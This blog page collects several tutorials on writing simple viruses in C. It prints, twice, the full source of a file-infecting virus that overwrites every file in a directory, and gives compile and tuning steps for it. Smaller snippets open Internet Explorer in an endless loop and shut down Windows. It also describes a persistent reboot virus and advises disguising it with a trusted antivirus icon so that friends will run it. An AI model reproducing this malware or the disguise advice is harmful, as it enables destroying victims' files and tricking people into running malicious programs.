Create Virus in C

Create Virus in C

http://learnhacking.in/create-virus-in-c/

http://www.gohacking.com/create-virus-to-restart-computer/

http://www.gohacking.com/create-computer-virus/

http://cmagical.blogspot.in/2009/11/create-simple-virus-in-c-programming.html

Create simple virus in c programming language



Write a c program such that when we will click its .exe file then it will open internet explorer at infinite times?

Answer:
Write the following program in TURBO C.
void main (void)
{
for(; ;)
{
system("c:\\progra~1\\intern~1\\iexplore.exe");
}
}
Save the above .Let file name is internet.c and compile the above program. Now close the turbo c compiler and open the directory in window operating system where you have saved the internet.c (default directory c:\tc\bin)and double click on its exe file (internet.exe).



Write c program which shutdown the window operating system?

Answer:
Write the following program in TURBO C.

(Only for study purpose)
void main (void){
    system("shutdown -s");
}
Save the above. Let file name is close.c and compile the above program. Now close the turbo c compiler and open that directory in window you have saved the close.c (default directory c:\tc\bin) and double click on its exe file (close.exe).After some time your window operating system will shutdown.


Read more: http://cmagical.blogspot.com/2009/11/create-simple-virus-in-c-programming.html#ixzz2KHoQZJIq
Under Creative Commons License: Attribution Non-Commercial No Derivatives

 

How to Create a Computer Virus?

This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.

Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
This virus is designed to infect all types of files with any extension.
You can download the source code from the following link:

How it Works?

The algorithm of this virus program is as follows:
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.

How to Compile the Program:

For a step-by-step guide, you can refer my detailed post on how to compile C programs?

How to Test the Virus After the Compilation:

  1. Create a new empty folder.
  2. Put some executable files (or any other files) in the folder.
  3. Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
  4. Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.
NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.
 

A Virus Program to Restart the Computer

In this post I will show you how to create a virus that will restart the computer at every startup. That is, upon infection, the computer will get restarted every time the system is booted. As a result, the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus needs to be executed only once and from then on, it will carry out rest of the operation on it’s own. I have programmed this virus using the C language. If you are familiar with the C language then it is too easy to understand the logic behind the coding. The code is not posted here in this article, but you can download it from the link below.

Compiling the source code into an executable module:

  1. Download the Source Code Here
  2. UnRar the file and you should see the source code: Sysres.C
  3. For a step-by-step compilation guide, refer my post: How to compile C Programs?

Testing and removing the virus from your PC:

You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From now on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by following the below mentioned steps:
  1. Reboot your computer in the SAFE MODE
  2. Go to:
    %systemroot%\Windows\System
    (%systemroot% can be C,D,E or F)
  3. You will find a file by name sysres.exe, delete it.
  4. Type regedit in run. You will go to the registry editor. Here navigate to:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run
    There, on the right site you will see an entry by name “sres“. Delete this entry. That’s it. You have now removed this virus successfully.

Logic Behind the working of this virus program:

If I do not explain the logic(Algorithm) behind the working of the virus program, I think this post would become an incomplete one. So I’ll explain the logic in a simplified manner without getting much into the technical aspects of the program. If you have further doubts, you can pass your comments.
LOGIC:
  1. First the virus will find the Root partition (Partition on which Windows is installed).
  2. Next, it will determine whether or not the virus file (sysres.exe) is already copied into %systemroot%\Windows\System.
  3. If not it will just place a copy of itself into %systemroot%\Windows\System and makes a registry entry to put this virus file into the Windows startup.
  4. Or else if the virus is already found in the %systemroot%\Windows\System directory (folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

How to change the icon of the executable module (This step is optional)

After you compile, the sysres.exe file that you get will have a default icon. If you send this file to your friends they may not execute it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example, you can change the icon into Norton antivirus ICON itself so that the people seeing this file believes that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular or trusted programs so that people will definitely click on it.
The detailed tutorial on changing the ICON is given in my post How to Change the ICON of an EXE File?

 

Create Virus in C

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %sn”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SECn”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it.
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE
 

 

No comments:

Post a Comment